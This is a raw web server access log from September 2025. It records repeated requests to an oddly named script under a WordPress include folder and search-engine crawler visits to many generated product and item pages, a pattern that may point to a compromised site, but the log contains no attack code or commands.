69.197.149.50 - - [18/Sep/2025:01:11:44 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:13:14 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:01:15:36 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
69.197.149.50 - - [18/Sep/2025:01:14:42 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:17:08 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/159fk49305 HTTP/1.1" 200 78522 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.37 - - [18/Sep/2025:01:17:25 -0300] "GET /products/42fn18874 HTTP/1.1" 200 77880 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:16:13 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:17:42 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:01:19:34 -0300] "GET /products/195bg10109 HTTP/1.1" 200 77841 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:19:15 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:20:43 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:22:16 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:23:45 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:01:26:34 -0300] "GET /products/1lz965 HTTP/1.1" 200 77302 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:01:25:19 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:26:48 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:28:18 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.12.208.18 - - [18/Sep/2025:01:31:07 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
69.197.149.50 - - [18/Sep/2025:01:29:54 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:31:26 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:01:33:04 -0300] "GET /products/296vj24160 HTTP/1.1" 200 78242 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:32:56 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:34:26 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:35:54 -0300] "GET /products/63ty34115 HTTP/1.1" 200 77536 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:35:58 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:37:28 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:39:05 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:40:37 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
101.99.88.90 - - [18/Sep/2025:01:42:32 -0300] "GET / HTTP/1.1" 200 463094 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:42:06 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
69.197.149.50 - - [18/Sep/2025:01:43:34 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:45:09 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/1xw18899 HTTP/1.1" 200 78079 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.38 - - [18/Sep/2025:01:45:20 -0300] "GET /products/86bi40086 HTTP/1.1" 200 77333 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.12.208.18 - - [18/Sep/2025:01:45:51 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.1"
69.197.149.50 - - [18/Sep/2025:01:45:18 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:01:47:02 -0300] "GET /items/pmetb242/46195?key=longtime HTTP/1.1" 200 77106 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.39 - - [18/Sep/2025:01:48:10 -0300] "GET /products/10fd39178 HTTP/1.1" 200 77272 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.39 - - [18/Sep/2025:01:48:11 -0300] "GET /items/rwdch105/11660?key=intend HTTP/1.1" 200 77781 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:46:52 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:48:47 -0300] "GET /items/qiggm59/27930?key=criteria HTTP/1.1" 200 87447 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.38 - - [18/Sep/2025:01:49:56 -0300] "GET /items/jcoxc279/17662?key=developing HTTP/1.1" 200 77857 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:48:56 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:01:50:30 -0300] "GET /items/myznv73/27884?key=accomplish HTTP/1.1" 200 77510 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.39 - - [18/Sep/2025:01:51:35 -0300] "GET /items/cfwih188/49843?key=suffer HTTP/1.1" 200 77518 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:50:25 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:01:52:09 -0300] "GET /items/cflzt14/15375?key=view HTTP/1.1" 200 77787 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.38 - - [18/Sep/2025:01:53:16 -0300] "GET /items/nzyqy203/25992?key=boring HTTP/1.1" 200 77032 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:01:53:50 -0300] "GET /items/uvjmt224/40109?key=sex HTTP/1.1" 200 76981 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.39 - - [18/Sep/2025:01:54:55 -0300] "GET /items/xrvel19/46672?key=prime HTTP/1.1" 200 88338 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:01:55:29 -0300] "GET /items/injvs281/26746?key=Olympics HTTP/1.1" 200 77533 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:01:55:56 -0300] "GET /items/vetvv165/20348?key=afterward HTTP/1.1" 200 77126 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.38 - - [18/Sep/2025:01:56:25 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/1qx44829 HTTP/1.1" 200 77335 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.39 - - [18/Sep/2025:01:58:02 -0300] "GET /products/158xl11370 HTTP/1.1" 200 87195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.38 - - [18/Sep/2025:01:59:45 -0300] "GET /products/175pe47661 HTTP/1.1" 200 77975 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.39 - - [18/Sep/2025:02:00:33 -0300] "GET /products/140ej13418 HTTP/1.1" 200 77783 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
204.12.208.18 - - [18/Sep/2025:02:00:39 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 26 "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1"
66.249.70.37 - - [18/Sep/2025:02:00:51 -0300] "GET /?z=2342600690862&channel=167e71&from=http://api.evidenciarevista.com.br/link.jsp?products/146pe47634 HTTP/1.1" 200 77707 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.38 - - [18/Sep/2025:02:01:31 -0300] "GET /items/jpuar108/31365?key=accurately HTTP/1.1" 200 77835 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.12.208.18 - - [18/Sep/2025:02:00:19 -0300] "GET /wp-includes/imec50e5/index.php HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24"
66.249.70.38 - - [18/Sep/2025:02:01:48 -0300] "GET /products/57bp14433 HTTP/1.1" 200 77583 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.38 - - [18/Sep/2025:02:02:07 -0300] "GET /items/yxhll126/24683?key=fame HTTP/1.1" 200 87891 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:02:03:04 -0300] "GET /products/112cp11114 HTTP/1.1" 200 77691 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:02:01:48 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:02:03:16 -0300] "GET /items/mrglb249/6032?key=historically HTTP/1.1" 200 77186 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:02:03:19 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:02:04:58 -0300] "GET /items/bhrgt25/14870?key=remember HTTP/1.1" 200 77269 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:02:05:32 -0300] "GET /items/rzacu60/43037?key=anything HTTP/1.1" 200 77500 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:02:04:47 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:02:06:38 -0300] "GET /items/csnvu89/35564?key=badly HTTP/1.1" 200 86579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:02:07:12 -0300] "GET /items/pnsab206/757?key=reasonable HTTP/1.1" 200 78425 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:02:06:20 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.37 - - [18/Sep/2025:02:08:21 -0300] "GET /items/iardc187/31238?key=dog HTTP/1.1" 200 77234 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:02:08:57 -0300] "GET /items/xhkkh226/48559?key=farmer HTTP/1.1" 200 77269 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:02:07:49 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:02:10:39 -0300] "GET /items/urycc32/39955?key=lay HTTP/1.1" 200 77439 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:02:09:24 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.38 - - [18/Sep/2025:02:11:47 -0300] "GET /items/eiooy11/17494?key=pat HTTP/1.1" 200 77596 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:02:10:53 -0300] "GET /wp-includes/imec50e5/index.php?id=674975 HTTP/1.1" 200 - "http://api.evidenciarevista.com.br/wp-includes/imec50e5/index.php?id=674975" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.39 - - [18/Sep/2025:02:12:27 -0300] "GET /items/xdrsc234/10855?key=village HTTP/1.1" 200 89326 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.37 - - [18/Sep/2025:02:13:01 -0300] "GET /products/44ft15240 HTTP/1.1" 200 77607 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.38 - - [18/Sep/2025:02:13:16 -0300] "GET /items/ghgcz50/37359?key=storage HTTP/1.1" 200 86847 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.38 - - [18/Sep/2025:02:13:20 -0300] "GET /products/269gp41785 HTTP/1.1" 200 78325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
